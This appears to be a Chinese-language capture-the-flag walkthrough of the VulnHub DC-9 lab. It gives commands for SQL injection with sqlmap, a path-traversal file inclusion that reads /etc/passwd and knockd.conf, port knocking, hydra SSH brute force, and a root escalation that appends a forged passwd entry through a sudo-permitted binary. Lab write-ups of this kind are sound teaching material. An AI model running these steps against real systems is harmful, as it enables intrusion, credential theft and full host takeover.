靶场获取地址
https://www.vulnhub.com/entry/dc-9,412/
网络模式:NAT
攻击机:kali
目录
-
-
- 1、主机发现
- 2、存在文件包含
- 3、knockd敲门服务
- 4、提权
-
录)
1、主机发现
arp-scan -l
nmap -p- 192.168.194.170
80端口开放,22端口被过滤,后面会用到
可能会有SQL注入,使用1’ or 1=1#显示全部,所以存在
使用burpsuites抓包保存为文件post.txt,
sqlmap爆破
sqlmap -r /home/kali/Desktop/post.txt --dbs
使用-r参数
sqlmap -r /home/kali/Desktop/post.txt -D users --tables
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails --columns
sqlmap -r /home/kali/Desktop/post.txt -D users -T UserDetails -C username,password --dump
还有另一个staff库
使用admin 和 transorbital1登录
发现
File does not exist
2、存在文件包含
试下常见参数得到为file
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/passwd
3、knockd敲门服务
http://192.168.194.170/manage.php?file=…/…/…/…/…/…/etc/knockd.conf
通过看源文件更清晰
敲门 Knockd,敲击方法:nc、nmap,参考
此时22端口开放
使用之前爆破的用户密码进行hydra爆破
hydra -L dc9pass -P dc9pass2 192.168.194.170 ssh -t 20
对这账号都尝试进行登陆,只有janitor的家目录存在一个名为.secrets-for-putin的文件夹,并且在其中又得到一些密码
4、提权
参考
#python test.py read append 读取内容追加内容的意思
openssl passwd -1 -salt admin 123456
1 1 1admin$LClYcRe.ee8dQwgrFc5nz.
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test
sudo ./test /tmp/passwd /etc/passwd